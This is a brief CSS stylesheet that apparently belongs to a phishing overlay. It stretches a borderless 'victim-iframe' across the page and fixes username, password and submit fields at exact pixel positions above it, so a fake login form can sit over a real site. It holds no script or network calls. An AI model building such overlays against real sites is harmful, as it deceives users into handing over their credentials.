body {
    margin: 0;
}

.victim-iframe {
    width: 100%;
    height: 100%;
    border: 0px;
}
.login-form{
    width: 436px;
    margin-right: auto;
    margin-left: auto;
    position: fixed;
    top: 232px;
    right:0;
    left:0px;
}

#username {
    margin: 0px;
    padding: 3px;
    font-size: 13px;
    width: 370px;
    font-family: Arial;
    position: absolute;
    right:0;
    left:24px;
}

#password {
    margin: 0px;
    padding: 3px;
    font-size: 13px;
    width: 370px;
    font-family: Arial;
    position: absolute;
    right:0;
    left:24px;
    top: 50px;
}

#submit {
    margin: 0px;
    position: absolute;
    right:0;
    left:24px;
    top: 84px;
    padding: 2px 7px;
}